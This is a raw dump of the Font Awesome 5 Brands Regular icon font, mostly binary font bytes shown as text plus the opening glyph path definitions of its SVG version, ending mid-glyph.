�%"uu"%?�B:Uq0467>23>'.'.'&"+'67>27'#5<>7>7>7'&'&#'7'6767>�

r B	B #)�
�S$*+	
	SS#+,
	<	#�=11>��mm�	��
S{
=

>	{|	?

?	����2"&46&'&"&'.26�Α�Α�
ARA

PfP��Α�Ό'33'
1??������F".4>226'&#4&<74#"#"#6=276&#"1332325&53"��,��,&%
P%PS&�&mm&�&m�b$VB%/g$u`-0'��$�+"/+"54;276;2"Cn33�E�6�l��Ά	�����"2#!"&54635#'#3577#5##R��$=>=>>>=�\>==���.���MM�xMMxlii����
#'#'#735737537#75'3#�_lVb(m{Wa�CH�U4N��4POI 6SPߌHH@�\?��q?�2��35���'�;er�5�F���=�f5+�Q
GT`�3#'#75#37'2#7''67#6;65#>7>3732#%'67>''>+#"'&'236=#"&/35"'&'26?#036�z1*aIZ=6@B4X3��	
)�
z



l

�&)
t,+<o,���^	!A"	1L3
'#(	 !
:LI
Gd	e����5>2.'>?#535#5##3#3&#"3267#!"&5463&632#"z)d
Xmm3nn\�
Q.:-.0-MKa ��))#-"K7?C�)�$	-

33/#/-$"6 )4)��! I������b��i����&IZy%'#"'&545'&7461/>36767'767'36.76736'>6762#'&3&476726#&5&#&'&#7"/67676'&7676'657#&'/7'70*#67654'&'&'&#"'#&?#7"&#572366767'"'?67"'"'&#"#7?7>.'#&''.#'".'&'65.''&'67.'''0>7'2&/?&+57''#776.'&'.'77#6'.22277'7''7'3''76767/'#7/67&7'&676'.67'&'&6327'52&#5#63'64767>76.7307>'&6?#&3'&'&7&'676�
	=f<\BA(	
!	.4

%	

		o
 	
'
��



	 		

	
	
' 

	99
$1@'&-�		
*

	/ 6,


		I,-
-0 		,%+�
	
7'F

	


	(	 	
	�=b5<=Z-#		'
-

		
�
	


	
	 
	 !*	



	
		$&
��



<


)
�
!
$,,			

+/
 0	H




v	%03
21				C
	

����Z�v�!"76743765&54'&'3#6743627>7>4646'4&#*#.'&3!#"#23#5232'0&'&132'7>7261&'.'+3R��r)"s

7 S0,


t
d�		

	'	
k
IH
	
D-<	
	�)

  	e	��������`��&G�).#&'&504547>7'&'2>162323256'3'"#"'&'&#"2*&43:65654'&"#&7225<720323&'27215"5&'430>7&'&'&'#"#>272'&'4&'"0133'&6765674#"#"'67625656'&54632'6:3"5'.7>321&'&6*#'>5454'"572325454'"47032#32#*#*.'&*32%&+0#&76'&'4#*620#"#"72767676327454'"7032#3276"'67236"54&#&#"7636'&&36762#"#"47256'1"54'&767456'.7620#"3>76"#"#"&3656'4'"43:'32#"#"763265454'"#&6360#7>7+�"0'&1&7474+2'3676&'&"&56576&'"326&3645.&'��	gi�
�	�		0�
		0


?|5'#Z
�<
.$*';?



!	�%$
+.e
	+	g!"	

$%�(
�%76-Wj
U��{p�:<{�tc
�

R#

C1\C=�#
dhQ=KBemz

H1					
!

		"R%&


)/('E	3n
q:��g
	
& �$&
�e
Z�&"'[r~�����'<JX_l����%".5&&7'46?67632766''7&5&'46&'.<.523036'74'6'67&672>30?2&&&2#"'75'654%'4>2&16&#"&'6'3&74'&7&'&'&7276&5&633#65#6'&67"'6&261&>&'707&#&#'5063632*#75'35'32'22>=4.#":>5#54.*#3#75'3#372#".>26&"'#75'37'3'&'320637+676=40:>4."&3#.'#75'35'#6'254.*#&63&674'&':	$	'
	
	�!;//��
	
*��
	
		89e<QI4%�
#J*,-*I!
#�',')r		�
	
	
31NL! d	

l	 	<	M<N			B&&U	'"O	U,0	L	'*i
		����	#5>6+53%2#!"&546354&+32675#"735#535#57#'#r(��n0/e?		>5  �&! &�	F	h���h��G�j	}&&s�rr����!GKO'36767&'&7>672&1&'&67.'.'1'&'6	37'���7:
 
)"AJ�D!		
!&	5=*���������9

&	&K|D!	%	6
	�����	�x2K^66'6%'#"&/45467'&54>67676>7>.#0#"77''77''77'?�(�
Wbo�o	w
QV�RO9
�
X2$s0�mC=J!q:	.>/.18'8
,-2$3
		�
$!
,s,-
-�,~,'�}%Wah���*=U`����W\by���76&654&'&#6'76"10'4?#&'2#4'5654'&'654&#"#./>6'&7'7'>15.'675&'#&'56767.#5675".'565'#34>307&'.'&7"2#04/5"267&'4.17676767#'4.56461##&563&'5#6376535"'&'474656'.#672<15&7507&7>7#7.767.7&#76&'&&561"&'2157>7202'3>17&67>7&'&75."&7#76'&7627&'24767?.3'45'3654&5473.#&7'7'"'0#&7''''7''&'.?'>0327'7'067''&/67'7"'76%63''>'2#54.#"#&'56#"7>'&76567"&�

\9+aWYc.:�	3o�I9E|,r6CIo*
		8

7	
	&



	+		
.

	
&HL%CA"	
;_
(
!$$*"

=
%[UCB-K+�m	�AnI3,MsB<27

@		 f		D(P
G,��sR	


)	1G9Si	2&��
�G�		 
	
	

-					
P7y


Y%
\*
				/B%=A=+
$	*


;

!^+
XF	D;7%+P		'/#b	(&|2=;
(P@(�
7


���
%'73#��� ��8 �E�� �v'a�����_j�k]�����>�	2Nem����������	Ngx����"?'373'7'373'2#"=432+"54"2545<632+"=4;2+32+'+"/#+"=4;2'54+327+"/#+"?6;23'+"=#"=4;2+2+"=432+32+'2+"=4354"2'+"/#+"=4;2'2=4+72++"=454#323'7'3?#"&'&'>7&'.7.5467&76326&'."&'>%167676.#"6'&'67'32767>.'&'&'67&'.'&&'67&#&'67273&'277672767&'6753'2+"=4;22=433'7'373'7'3?2+"=4;2+32+73'7'3�:aNO	U�J.



`




��--=8 "b2-(*+"

(A7 "a3.'
)(I3��)+.0.X&$0-0-XT$ (;6( 	
4:9:&"6:+	m�6
(
$<;		;;*265??((4$$?	!
?3�00/[+GG	?@	N>2[+GG	>A'Q;�

#>@�6'T
#>A�'!	+--		_4422U?d����
3#'#"��ޫ�lIN���������L���
5!!"'%32#7;;�� �)��X=�tGgf G��������7+"&?>762+"'.>�2	�	}b�	�		'		�6�;���J*H3G<I����E%&'&#4>54676&/76/?6/????i
_
ji
0
4
+&(7
:
g`
#q
]
C

 <�PHx
>

<
Z����#+37;CGKOW_573'7#'5#'73?5#'735%53#'%'#57'#'7'57#7'537'#5'53'357'#573"Lv -#78-�88�ZL B8�

���P [Z ZZd- M�!L�NZZ  L/-�!mj87,z P!Z^ Ll  lv88���-88-
L-8--N ZZ/NZZ ��MG-LeN ZZZ-Li l/-�88��* NZ�����#F767>'&'./&"&'&'.?>>7076($<?W0732

'"4!
j
($<?W1193

3):"	
j$.r
BF.
r
	A
���+/48<@HO?3%3#73+732%#73#576+732#"7>533613373'3#73'3#7333#"&7�;��VR�D#d)3
F>(>�M[�pu-	�N�;�ZIIM	R�:'�(:8�^
�75<
7N55������-7"1"&464.'">125061622>101"&�XVWAG HIgEE�SVY]x=~f� .. f0y?}Z� 48?KR^%#'#5##"&'#73&547##53#3>>32353#3733.26&#"5#535#535#737'#3'7#'#3J6@�"V#*
@511m<732	
�8w>�/&�!
�8878_18228�(.-&(..&�="!%#
M�)L1+E 3,"�(.99,"4233������#)/5;AHMS���������2+"&=6&/'&6'&57'67'67'67'67'&5547'&/67'726&+"=46>54&'&#"#";2#"&#"36=367'67'67'67'67'67''6767'����]��77��	#5"1$.'.4178+;@H�

"+		

,>*

!!
.OB		$	6#0$.(26)@���� �\
8!6-�	$#$(6
8 -\@I
-	/	=,8/!


>38$#$(5*
A��V�##"&463"&463"&46;2"2"&4U2G22##22##22#� 
2FF22F2�#22G22F22G2 $22F22F����'/AI2#!"&54632=4"2=4"2=4"2=4">.""'&"6754"2�!!��!!�KKJC
0�2
:�<�!��!!P!R������-���
))
0�������N2#!"&54634&32>27'#&5676.7#3547#36737676�����&	"	D
 
!M	 ".-	���nr

�45&($O�$] g$
����%?&'&47677'�I��M�&��LLL�J��M�&�|LLL��
�sCR%.'&76'&'&756'&'.676>'&6332>7262654&+"3q#1+-1(''(1+,1)$
55)"55��"%%
{;
0,A@ -/";,-20-VV-02(%%������lt|�� *6>KWcm%+"'&'.'&'.6?4>7&'&'&7&7&7&7&66366632362636730764622>6626'6.>.677&'>7&'67"'67&'67'67'467'67"#"57&&7&461&7&7&5&&2656&'>7&'>&'&'&'&'&'0&'&#'''#&7676'&6&'.&>.26'4&&754&"266&'&67>&'&t
%$$
%

	
			
	
%+/:%.$
)=D			

	

$"$�D=)	
	


	7#1.+p	
g

!	-%%.%.~&%(I#1"#1"R
	&
#
	�
%2$		$2%
 		
	
	





	
	
	
# "%'^/+
/*
!#
	
	l


"!
	
	
&$(%�% )$l*'
�
+.
+�			
~  -*.
Y
$)
'���n���%'&&7676722&5&367>767>5465&#"&#"#.#"#.'&&'&'&'.#"+&546&'&7676'.'&"&'&"#&'&7&6'2&/.7622676#"'0416'&"4368	�Ԗ)+"




 	
�""(

	6

$	
J$
#0X2Q��				E 	/s�jK@


		

'*jd!	&!
&-

1/!�	
(
����
7#%'3?3#/?/OZ���{�[
�=Q
[�XZ����$�f+j������	�BX	���vq&0����S������%+"&=.5462>54&"�N>	`	>Nw�w��()+3+�BkffkBTwwT## %%��ybjt��7&'367#".#.#"#.'&676&'&32>36#"&'47>'&'&'&767>6&'"7#".4>24"�[&
"0
74
	1	.
;66


$	0!3	J$D33?I=.$
&
Y

<	

 

.5	E&	-			0($#>05#/

����)1>J2"&4$>.2654.#"7&47'>.767''7>?&'&'&6�Α�Α3
�	
%
+''+
�
%%.R+/2.%%2/+R��Α��?

�
		
		2(^(2+�

E$4//)e4$)0��x�';FSk753&=36'>.5!5&>'>'#7>54.46&'56'4.c!#!_J�[
!,*f'\TY%1,*"'-� $/!!
	O;
#7$�{�fh
�',�		�+"~("�&#2#E`				 
`3H%'&74>&#&'4>76;27232#>7%!!$7>&'."#.'&�/�
%:'Y447^E'�7H1���D�Y�

Q�H�
5

,�
	]
��������QY�%'&>?&/'&7'.67&7.76767>30767"12676326"&462.#6'676&'&&'&"&"7327676767>�$0

/

		\�Α��B 	
%
/"	g	
5!	

		'�Α�Α��

/ -
	"1

	V6��#k%�1
,�Gm��!	4	:Q	�	F�	:/	J�	4�	
XL	.�	*	]	:u	*�	Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Brands RegularFont Awesome 5 Brands RegularRegularRegularFont Awesome 5 Brands Regular-5.7.2Font Awesome 5 Brands Regular-5.7.2Font Awesome 5 Brands RegularFont Awesome 5 Brands Regular329.474 (Font Awesome version: 5.7.2)329.474 (Font Awesome version: 5.7.2)FontAwesome5Brands-RegularFontAwesome5Brands-RegularThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 BrandsFont Awesome 5 BrandsRegularRegularFont Awesome 5 Brands RegularFont Awesome 5 Brands RegularFont Awesome 5 BrandsFont Awesome 5 BrandsRegularRegular���	

� !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~��������������������������������������������������������������������������������������������������������������������������������	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~������������������������������twitter-squarefacebook-squarelinkedin
github-squaretwitterfacebookgithub	pinterestpinterest-squaregoogle-plus-square
google-plus-glinkedin-in
github-altmaxcdnhtml5css3btcyoutubexingxing-squaredropboxstack-overflow	instagramflickradn	bitbuckettumblr
tumblr-squarewindowsandroidlinuxdribbbleskype
foursquaretrellogratipayvkweiborenren	pagelinesstack-exchangevimeo-squareslack	wordpressopenidyahoogooglereddit
reddit-squarestumbleupon-circlestumbleupon	deliciousdigg
pied-piper-pppied-piper-altdrupaljoomlabehancebehance-squaresteamsteam-squarespotify
deviantart
soundcloudvinecodepenjsfiddlerebelempire
git-squaregithacker-news
tencent-weiboqqweixin
slidesharetwitchyelppaypal
google-walletcc-visa
cc-mastercardcc-discovercc-amex	cc-paypal	cc-stripelastfm
lastfm-squareioxhost	angellist
buyselladsconnectdevelopdashcubeforumbeeleanpubsellsyshirtsinbulksimplybuiltskyatlaspinterest-pwhatsappviacoinmediumy-combinator
optin-monsteropencartexpeditedsslcc-jcbcc-diners-clubcreative-commonsgg	gg-circletripadvisor
odnoklassnikiodnoklassniki-square
get-pocketwikipedia-wsafarichromefirefoxoperainternet-explorercontao500pxamazonhouzzvimeo-v	black-tie	fonticonsreddit-alienedgecodiepiemodxfort-awesomeusbproduct-huntmixcloudscribd	bluetoothbluetooth-bgitlab
wpbeginnerwpformsenviraglideglide-gviadeo
viadeo-squaresnapchatsnapchat-ghostsnapchat-square
pied-piperfirst-orderyoast	themeislegoogle-plusfont-awesomelinodequorafree-code-camptelegrambandcampgravetsyimdbravelrysellcastsuperpowers
wpexplorermeetupfont-awesome-altaccessible-iconaccusoftadversalaffiliatethemealgoliaamilia
angrycreative	app-store
app-store-iosapper
asymmetrikaudibleavianexaws	bimobjectbitcoinbity
blackberryblogger	blogger-bburomobelexperte
centercode
cloudscale
cloudsmithcloudversifycpanelcss3-alt
cuttlefishd-and-d	deploydogdeskpro
digital-oceandiscord	discoursedochubdocker
draft2digitaldribbble-squaredyalog
earlybirdserlang
facebook-ffacebook-messenger
firstdraftfonticons-fifort-awesome-altfreebsd	gitkrakengofore	goodreadsgoodreads-ggoogle-drivegoogle-playgripfiregruntgulphacker-news-square
hire-a-helperhotjarhubspotitunesitunes-notejenkinsjogetjs	js-squarekeycdnkickstarter
kickstarter-klaravellinelyftmagentomedappsmedium-mmedrt	microsoftmixmizunimoneronapsternode-jsnpmns8nutritionixpage4palfedpatreon	periscopephabricatorphoenix-frameworkplaystationpushedpython	red-riverwpressrreplyd	resolving
rocketchatrockrmsschlixsearchenginservicestacksistrix
slack-hashspeakap
staylinkedsteam-symbolsticker-mulestudiovinarisuppletelegram-planeuberuikituniregistryuntappdussunnahvaadinvibervimeovnvwhatsapp-squarewhmcswordpress-simplexboxyandexyandex-international	apple-paycc-apple-payflynintendo-switchnodeosireactautoprefixersassvuejsangularaviatoemberfont-awesome-flaggitterhoolistravastripestripe-stypo3
amazon-pay
cc-amazon-payethereumkorvue	elementoryoutube-square	flipboardhipsphp	quinscapereadmejavapied-piper-hatcreative-commons-bycreative-commons-nccreative-commons-nc-eucreative-commons-nc-jpcreative-commons-ndcreative-commons-pdcreative-commons-pd-altcreative-commons-remixcreative-commons-sacreative-commons-samplingcreative-commons-sampling-pluscreative-commons-sharecreative-commons-zeroebaykeybasemastodon	r-projectresearchgate	teamspeakfirst-order-altfulcrumgalactic-republicgalactic-senate
jedi-ordermandalorianold-republicphoenix-squadronsithtrade-federationwolf-pack-battalionhornbill	mailchimpmegaportnimblrrevshopwaresquarespacethemecoweeblywixello
hackerrankkagglemarkdownneoszhihualipaythe-red-yetiacquisitions-incorporated
critical-roled-and-d-beyonddevfantasy-flight-gamespenny-arcadewizards-of-the-coastthink-peaksreacteuropeadobe
artstation	atlassiancanadian-maple-leafcentos
confluencedhldiasporafedexfedorafigmaintercominvisionjiramendeleyraspberry-piredhatsketch
sourcetreesuseubuntuupsuspsyarn����`)l؈��؈��PK!\��:�
�
&fontawesome/webfonts/fa-brands-400.svgnu&1i�<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<metadata>
Created by FontForge 20190112 at Tue Feb 12 10:24:59 2019
 By Robert Madole
Copyright (c) Font Awesome
</metadata>
<defs>
<font id="FontAwesome5Brands-Regular" horiz-adv-x="448" >
  <font-face 
    font-family="Font Awesome 5 Brands Regular"
    font-weight="400"
    font-stretch="normal"
    units-per-em="512"
    panose-1="2 0 5 3 0 0 0 0 0 0"
    ascent="448"
    descent="-64"
    bbox="-0.200195 -66.9505 641.5 448.3"
    underline-thickness="25"
    underline-position="-51"
    unicode-range="U+0020-F7E3"
  />
    <missing-glyph />
    <glyph glyph-name="twitter-square" unicode="&#xf081;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM351.1 257.2c12.8008 9.2998 24 20.8994 32.9004 34c-11.7998 -5.10059 -24.5996 -8.7998 -37.7998 -10.2002
c13.5996 8.09961 23.8994 20.9004 28.7998 36.0996c-12.5996 -7.5 -26.7998 -13 -41.5996 -15.7998c-12 12.7998 -29 20.7002 -47.9004 20.7002c-40 0 -73.2998 -36.0996 -64 -80.5996c-54.4004 2.7998 -102.9 28.7998 -135.2 68.5996
c-5.7002 -9.7002 -8.89941 -20.9004 -8.89941 -33.0996v-0.107422c0 -19.3584 13.0811 -43.7715 29.1992 -54.4932c-10.6992 0.400391 -20.8994 3.40039 -29.5996 8.2998v-0.799805c0 -31.8994 22.5 -58.2998 52.5 -64.3994
c-10.4004 -2.7002 -19.5 -2.7002 -29.5996 -1.2002c8.2998 -26 32.5 -44.9004 61.2998 -45.5c-22.5 -17.6006 -50.7002 -28 -81.4004 -28c-5.39941 0 -10.5 0.200195 -15.7998 0.799805c29 -18.5996 63.5 -29.4004 100.7 -29.4004c120.6 0 186.6 99.9004 186.6 186.601
c0 2.7998 0 5.7002 -0.200195 8.5z" />
    <glyph glyph-name="facebook-square" unicode="&#xf082;" 
d="M448 368v-352c0 -26.5 -21.5 -48 -48 -48h-85.2998v177.2h60.5996l8.7002 67.5996h-69.2998v43.2002c0 19.5996 5.39941 32.9004 33.5 32.9004h35.7998v60.3994c-6.2002 0.799805 -27.4004 2.7002 -52.2002 2.7002c-51.5996 0 -87 -31.5 -87 -89.4004v-49.8994h-60.7998
v-67.6006h60.9004v-177.1h-196.9c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352c26.5 0 48 -21.5 48 -48z" />
    <glyph glyph-name="linkedin" unicode="&#xf08c;" 
d="M416 416c17.5996 0 32 -14.5 32 -32.2998v-383.4c0 -17.7998 -14.4004 -32.2998 -32 -32.2998h-384.1c-17.6006 0 -31.9004 14.5 -31.9004 32.2998v383.4c0 17.7998 14.2998 32.2998 31.9004 32.2998h384.1zM135.4 32h0.0996094v213.8h-66.5v-213.8h66.4004zM102.2 275
c21.2998 0 38.5 17.2002 38.5 38.5c0 21.2002 -17.2998 38.5 -38.5 38.5c-21.2998 0 -38.5 -17.2998 -38.5 -38.5s17.2002 -38.5 38.5 -38.5zM384.3 32v117.2c0 57.5996 -12.5 101.899 -79.7002 101.899c-32.2998 0 -54 -17.6992 -62.8994 -34.5h-0.900391v29.2002h-63.7002
v-213.8h66.4004v105.8c0 27.9004 5.2998 54.9004 39.9004 54.9004c34 0 34.5 -31.9004 34.5 -56.7002v-104h66.3994z" />
    <glyph glyph-name="github-square" unicode="&#xf092;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM277.3 32.2998c66 22 110.8 84.9004 110.7 158.3c0 91.8008 -74.4004 161.5 -166.2 161.5s-162 -69.6992 -162 -161.5
c0 -73.3994 46.2002 -136.199 112.2 -158.3c8.5 -1.5 11.5 3.7002 11.5 8c0 4.10059 -0.200195 26.7002 -0.200195 40.6006c0 0 -46.3994 -10 -56.0996 19.6992c0 0 -7.60059 19.2002 -18.4004 24.2002c0 0 -15.0996 10.4004 1.10059 10.2002
c0 0 16.3994 -1.2998 25.5 -17.0996c14.5 -25.6006 38.7998 -18.2002 48.2998 -13.9004c1.5 10.5996 5.7998 18 10.5996 22.2998c-37 4.10059 -74.2998 9.5 -74.2998 73.1006c0 18.1992 5 27.2998 15.5996 39c-1.7998 4.39941 -7.39941 22.0996 1.7002 45
c13.9004 4.2998 45.7002 -17.9004 45.7002 -17.9004c13.2002 3.7002 27.5 5.59961 41.5996 5.59961c14.1006 0 28.4004 -1.89941 41.6006 -5.59961c0 0 31.7998 22.2002 45.7002 17.9004c9.09961 -23 3.39941 -40.7002 1.69922 -45
c10.6006 -11.7002 17.1006 -20.8008 17.1006 -39c0 -63.9004 -39 -69 -76 -73.1006c6.09961 -5.2002 11.2998 -15.0996 11.2998 -30.7002c0 -22.2998 -0.200195 -49.8994 -0.200195 -55.2998c0 -4.2998 3.10059 -9.5 11.5 -8zM179.2 93.4004
c-1.90039 -0.400391 -3.7002 0.399414 -3.90039 1.69922c-0.200195 1.5 1.10059 2.80078 3 3.2002c1.90039 0.200195 3.7002 -0.599609 3.90039 -1.89941c0.299805 -1.30078 -1 -2.60059 -3 -3zM169.7 94.2998c0 1.5 -1.7998 2.60059 -3.7002 2.40039
c-2 0 -3.5 -1.10059 -3.5 -2.40039c0 -1.5 1.5 -2.59961 3.7002 -2.39941c2 0 3.5 1.09961 3.5 2.39941zM156 95.4004c-0.400391 -1.30078 -2.40039 -1.90039 -4.09961 -1.30078c-1.90039 0.400391 -3.2002 1.90039 -2.80078 3.2002
c0.400391 1.2998 2.40039 1.90039 4.10059 1.5c2 -0.599609 3.2998 -2.09961 2.7998 -3.39941zM143.7 100.8c0.899414 0.799805 0.399414 2.7998 -0.900391 4.10059c-1.5 1.5 -3.39941 1.69922 -4.2998 0.599609c-1 -0.900391 -0.599609 -2.7998 0.900391 -4.09961
c1.5 -1.5 3.39941 -1.7002 4.2998 -0.600586zM134.6 109.9c1.10059 0.799805 1.10059 2.59961 0 4.09961c-0.899414 1.5 -2.59961 2.2002 -3.69922 1.2998c-1.10059 -0.700195 -1.10059 -2.39941 0 -3.89941c1.09961 -1.5 2.7998 -2.10059 3.69922 -1.5zM128.1 119.6
c0.900391 0.700195 0.700195 2.2002 -0.399414 3.5c-1.10059 1 -2.60059 1.5 -3.5 0.600586c-0.900391 -0.700195 -0.700195 -2.2002 0.399414 -3.5c1.10059 -1 2.60059 -1.5 3.5 -0.600586zM121.4 127c0.399414 0.799805 -0.200195 1.90039 -1.5 2.59961
c-1.30078 0.5 -2.40039 0.200195 -2.80078 -0.399414c-0.399414 -0.900391 0.200195 -2 1.5 -2.60059c1.10059 -0.699219 2.40039 -0.5 2.80078 0.400391z" />
    <glyph glyph-name="twitter" unicode="&#xf099;" horiz-adv-x="511" 
d="M459.37 296.284c0.325195 -4.54785 0.325195 -9.09766 0.325195 -13.6455c0 -138.72 -105.583 -298.558 -298.559 -298.558c-59.4521 0 -114.68 17.2188 -161.137 47.1055c8.44727 -0.973633 16.5684 -1.29883 25.3398 -1.29883
c49.0547 0 94.2129 16.5684 130.274 44.832c-46.1318 0.975586 -84.792 31.1885 -98.1123 72.7725c6.49805 -0.974609 12.9951 -1.62402 19.8184 -1.62402c9.4209 0 18.8428 1.2998 27.6133 3.57324c-48.0811 9.74707 -84.1426 51.9795 -84.1426 102.984v1.29883
c13.9688 -7.79688 30.2139 -12.6699 47.4307 -13.3184c-28.2637 18.8428 -46.7803 51.0049 -46.7803 87.3906c0 19.4922 5.19629 37.3604 14.2939 52.9541c51.6543 -63.6748 129.3 -105.258 216.364 -109.807c-1.62402 7.79688 -2.59863 15.918 -2.59863 24.04
c0 57.8271 46.7822 104.934 104.934 104.934c30.2139 0 57.502 -12.6699 76.6709 -33.1367c23.7148 4.54785 46.4551 13.3193 66.5986 25.3398c-7.79785 -24.3662 -24.3662 -44.833 -46.1318 -57.8271c21.1172 2.27344 41.584 8.12207 60.4258 16.2432
c-14.292 -20.791 -32.1611 -39.3086 -52.6279 -54.2529z" />
    <glyph glyph-name="facebook" unicode="&#xf09a;" 
d="M448 391.3v-398.5c0 -13.7002 -11.0996 -24.7002 -24.7002 -24.7002h-114.2v173.4h58.2002l8.7002 67.5996h-67v43.2002c0 19.6006 5.40039 32.9004 33.5 32.9004h35.7998v60.5c-6.2002 0.799805 -27.3994 2.7002 -52.2002 2.7002c-51.5996 0 -87 -31.5 -87 -89.4004
v-49.9004h-58.3994v-67.5996h58.3994v-173.5h-214.399c-13.6006 0 -24.7002 11.0996 -24.7002 24.7002v398.6c0 13.6006 11.0996 24.7002 24.7002 24.7002h398.5c13.7002 0 24.7998 -11.0996 24.7998 -24.7002z" />
    <glyph glyph-name="github" unicode="&#xf09b;" horiz-adv-x="496" 
d="M165.9 50.5996c0 -2 -2.30078 -3.59961 -5.2002 -3.59961c-3.2998 -0.299805 -5.60059 1.2998 -5.60059 3.59961c0 2 2.30078 3.60059 5.2002 3.60059c3 0.299805 5.60059 -1.2998 5.60059 -3.60059zM134.8 55.0996c0.700195 2 3.60059 3 6.2002 2.30078
c3 -0.900391 4.90039 -3.2002 4.2998 -5.2002c-0.599609 -2 -3.59961 -3 -6.2002 -2c-3 0.599609 -5 2.89941 -4.2998 4.89941zM179 56.7998c2.90039 0.299805 5.59961 -1 5.90039 -2.89941c0.299805 -2 -1.7002 -3.90039 -4.60059 -4.60059
c-3 -0.700195 -5.59961 0.600586 -5.89941 2.60059c-0.300781 2.2998 1.69922 4.19922 4.59961 4.89941zM244.8 440c138.7 0 251.2 -105.3 251.2 -244c0 -110.9 -67.7998 -205.8 -167.8 -239c-12.7002 -2.2998 -17.2998 5.59961 -17.2998 12.0996
c0 8.2002 0.299805 49.9004 0.299805 83.6006c0 23.5 -7.7998 38.5 -17 46.3994c55.8994 6.30078 114.8 14 114.8 110.5c0 27.4004 -9.7998 41.2002 -25.7998 58.9004c2.59961 6.5 11.0996 33.2002 -2.60059 67.9004c-20.8994 6.59961 -69 -27 -69 -27
c-20 5.59961 -41.5 8.5 -62.7998 8.5s-42.7998 -2.90039 -62.7998 -8.5c0 0 -48.0996 33.5 -69 27c-13.7002 -34.6006 -5.2002 -61.4004 -2.59961 -67.9004c-16 -17.5996 -23.6006 -31.4004 -23.6006 -58.9004c0 -96.1992 56.4004 -104.3 112.3 -110.5
c-7.19922 -6.59961 -13.6992 -17.6992 -16 -33.6992c-14.2998 -6.60059 -51 -17.7002 -72.8994 20.8994c-13.7002 23.7998 -38.6006 25.7998 -38.6006 25.7998c-24.5 0.300781 -1.59961 -15.3994 -1.59961 -15.3994c16.4004 -7.5 27.7998 -36.6006 27.7998 -36.6006
c14.7002 -44.7998 84.7002 -29.7998 84.7002 -29.7998c0 -21 0.299805 -55.2002 0.299805 -61.3994c0 -6.5 -4.5 -14.4004 -17.2998 -12.1006c-99.7002 33.4004 -169.5 128.3 -169.5 239.2c0 138.7 106.1 244 244.8 244zM97.2002 95.0996
c1.2998 1.30078 3.59961 0.600586 5.2002 -1c1.69922 -1.89941 2 -4.19922 0.699219 -5.19922c-1.2998 -1.30078 -3.59961 -0.600586 -5.19922 1c-1.7002 1.89941 -2 4.19922 -0.700195 5.19922zM86.4004 103.2c0.699219 1 2.2998 1.2998 4.2998 0.700195
c2 -1 3 -2.60059 2.2998 -3.90039c-0.700195 -1.40039 -2.7002 -1.7002 -4.2998 -0.700195c-2 1 -3 2.60059 -2.2998 3.90039zM118.8 67.5996c1.2998 1.60059 4.2998 1.30078 6.5 -1c2 -1.89941 2.60059 -4.89941 1.2998 -6.19922
c-1.2998 -1.60059 -4.19922 -1.30078 -6.5 1c-2.2998 1.89941 -2.89941 4.89941 -1.2998 6.19922zM107.4 82.2998c1.59961 1.2998 4.19922 0.299805 5.59961 -2c1.59961 -2.2998 1.59961 -4.89941 0 -6.2002c-1.2998 -1 -4 0 -5.59961 2.30078
c-1.60059 2.2998 -1.60059 4.89941 0 5.89941z" />
    <glyph glyph-name="pinterest" unicode="&#xf0d2;" horiz-adv-x="496" 
d="M496 192c0 -137 -111 -248 -248 -248c-25.5996 0 -50.2002 3.90039 -73.4004 11.0996c10.1006 16.5 25.2002 43.5 30.8008 65c3 11.6006 15.3994 59 15.3994 59c8.10059 -15.3994 31.7002 -28.5 56.7998 -28.5c74.8008 0 128.7 68.8008 128.7 154.301
c0 81.8994 -66.8994 143.199 -152.899 143.199c-107 0 -163.9 -71.7998 -163.9 -150.1c0 -36.4004 19.4004 -81.7002 50.2998 -96.0996c4.7002 -2.2002 7.2002 -1.2002 8.2998 3.2998c0.800781 3.39941 5 20.2998 6.90039 28.0996
c0.599609 2.5 0.299805 4.7002 -1.7002 7.10059c-10.0996 12.5 -18.2998 35.2998 -18.2998 56.5996c0 54.7002 41.4004 107.6 112 107.6c60.9004 0 103.6 -41.5 103.6 -100.899c0 -67.1006 -33.8994 -113.601 -78 -113.601c-24.2998 0 -42.5996 20.1006 -36.6992 44.8008
c7 29.5 20.5 61.2998 20.5 82.5996c0 19 -10.2002 34.9004 -31.4004 34.9004c-24.9004 0 -44.9004 -25.7002 -44.9004 -60.2002c0 -22 7.40039 -36.7998 7.40039 -36.7998s-24.5 -103.801 -29 -123.2c-5 -21.4004 -3 -51.6006 -0.900391 -71.2002
c-92.1992 36.0996 -157.6 125.9 -157.6 231c0 137 111 248 248 248s248 -111 248 -248z" />
    <glyph glyph-name="pinterest-square" unicode="&#xf0d3;" 
d="M448 368v-352c0 -26.5 -21.5 -48 -48 -48h-245.6c9.7998 16.4004 22.3994 40 27.3994 59.2998c3 11.5 15.2998 58.4004 15.2998 58.4004c8 -15.2998 31.4004 -28.2002 56.3008 -28.2002c74.0996 0 127.399 68.0996 127.399 152.7
c0 81.0996 -66.2002 141.8 -151.399 141.8c-106 0 -162.2 -71.0996 -162.2 -148.6c0 -36 19.2002 -80.8008 49.7998 -95.1006c4.7002 -2.2002 7.09961 -1.2002 8.2002 3.2998c0.799805 3.40039 5 20.1006 6.7998 27.8008c0.599609 2.5 0.299805 4.59961 -1.7002 7
